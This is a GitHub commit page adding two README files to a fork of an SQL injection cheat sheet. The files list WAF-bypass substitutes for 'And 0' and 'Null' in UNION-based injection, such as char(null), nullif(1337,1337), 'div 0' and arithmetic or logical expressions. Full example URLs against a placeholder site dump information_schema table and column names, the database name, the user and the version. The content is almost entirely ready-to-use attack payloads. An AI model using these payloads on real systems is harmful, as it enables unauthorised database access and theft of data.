forked from kleiton0x00/Advanced-SQL-Injection-Cheatsheet
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
1d8ab37
commit 58e588d
Showing
2 changed files
with
87 additions
and
0 deletions.
There are no files selected for viewing
45 changes: 45 additions & 0 deletions
45
The Alternative way of using And 0 in SQL Injection/README.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,45 @@ | ||
| # The Alternative WAY of using And 0 in SQL Injection | ||
|
|
||
| ## The traditional way of using **And 0** | ||
| ``` | ||
| And 1=0 | ||
| And false | ||
| And 0 | ||
| And 50=60 | ||
| Any number that are not the same will equal to (0,false,null) | ||
| ``` | ||
|
|
||
| ## The alternative way of using **And 0** for WAF Bypass purpose | ||
|
|
||
| ### Using char() for 0, null, false values | ||
| ``` | ||
| And char(0) | ||
| And char(false) | ||
| And char(null) | ||
| ``` | ||
|
|
||
| ### Any Mathematical/Arithmetic or Logical Problem's that equal to 0 | ||
| ``` | ||
| And 1*0 | ||
| And 1-1 | ||
| And 0/1 | ||
| ``` | ||
|
|
||
| ### Using and nuliff(1336,1337) | ||
| If one arguments is different nullif(1336,1337) it return the first argument and it will consider as true.So no need to use this.But sometimes it works. Since both arguments are equal it return as null value or it's considered as false,0,null and it will valid as Bypass Method in SQL. | ||
|
|
||
| ``` | ||
| And nullif(1337,1337) | ||
| ``` | ||
|
|
||
| ## Example: | ||
|
|
||
| Using **char(0)** | ||
| ``` | ||
| http://website.com/index.php?id=1 and char(0) Union Select '1 and char(0) union select 1,2,group_concat(0x3c6c693e,table_name,0x203a3a20,column_name),4,5,6 from information_schema.columns where table_schema=database()',2,3,4,5,6--+- | ||
| ``` | ||
|
|
||
| Using **nullif(1337,1337) | ||
| ``` | ||
| http://website.com/index.php?id=1 and nullif(1337,1337) Union Select '1 and nullif(1337,1337) union select 1,2,group_concat(0x3c6c693e,table_name,0x203a3a20,column_name),4,5,6 from information_schema.columns where table_schema=database()',2,3,4,5,6--+- | ||
| ``` |
42 changes: 42 additions & 0 deletions
42
The Alternative way of using Null in SQL Injection/README.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,42 @@ | ||
| # The Alternative WAY of using Null in SQL Injection | ||
|
|
||
| ## The traditional way of using Null | ||
|
|
||
| ``` | ||
| Union Select null,null,null,null | ||
| ``` | ||
|
|
||
| ## The alternative way of using Null | ||
|
|
||
| ``` | ||
| Union Select 0,0,0,0 | ||
| Union Select false,false,false,false | ||
| Union Select char(null),char(null),char(null),char(null) | ||
| Union Select char(false),char(false),char(false),char(false) | ||
| Union Select (0*1337-0),(0*1337-0),(0*1337-0),(0*1337-0) | ||
| Union Select 34=35,34=35,34=35,34=35 | ||
| ``` | ||
|
|
||
| ## Examples | ||
|
|
||
| Using **0** | ||
|
|
||
| ``` | ||
| http://website.com/index.php?id=1 div 0 Union Select "0 div 0 Union Select 0,0,0,0,concat(0x222f3e,0x3c62723e,'Injected',0x3c62723e,'<br>','Database :: ',database(),0x3c62723e,'User :: ',user(),0x3c62723e,'Version :: ',version(),0x3c62723e,user(),make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),0x3c62723e),0--+",0,0,0,0,0--+ | ||
| ``` | ||
|
|
||
| Using **false** | ||
| ``` | ||
| http://website.com/index.php?id=1 div false Union Select "false div false Union Select false,false,false,false,concat(0x222f3e,0x3c62723e,'Injected',0x3c62723e,'<br>','Database :: ',database(),0x3c62723e,'User :: ',user(),0x3c62723e,'Version :: ',version(),0x3c62723e,user(),make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),0x3c62723e),false--+",false,false,false,false,false--+ | ||
| ``` | ||
|
|
||
| Using **char()** | ||
| ``` | ||
| http://website.com/index.php?id=1 div char(null) Union Select "char(null) div char(null) Union Select char(null),char(null),char(null),char(null),concat(0x222f3e,0x3c62723e,'Injected',0x3c62723e,'<br>','Database :: ',database(),0x3c62723e,'User :: ',user(),0x3c62723e,'Version :: ',version(),0x3c62723e,user(),make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),0x3c62723e),char(null)--+",char(null),char(null),char(null),char(null),char(null)--+ | ||
| ``` | ||
|
|
||
| Using Arithmetic or Logical Operator | ||
| ``` | ||
| http://website.com/index.php?id=1 div (0*1337-0) Union Select "(0*1337-0) div (0*1337-0) Union Select (0*1337-0),(0*1337-0),(0*1337-0),(0*1337-0),concat(0x222f3e,0x3c62723e,'Injected',0x3c62723e,'<br>','Database :: ',database(),0x3c62723e,'User :: ',user(),0x3c62723e,'Version :: ',version(),0x3c62723e,user(),make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),0x3c62723e),(0*1337-0)--+",(0*1337-0),(0*1337-0),(0*1337-0),(0*1337-0),(0*1337-0)--+ | ||
| http://website.com/index.php?id=1 div 34=35 Union Select "34=35 div 34=35 Union Select 34=35,34=35,34=35,34=35,concat(0x222f3e,0x3c62723e,'Injected',0x3c62723e,'<br>','Database :: ',database(),0x3c62723e,'User :: ',user(),0x3c62723e,'Version :: ',version(),0x3c62723e,user(),make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),0x3c62723e),34=35--+",34=35,34=35,34=35,34=35,34=35--+ | ||
| ``` |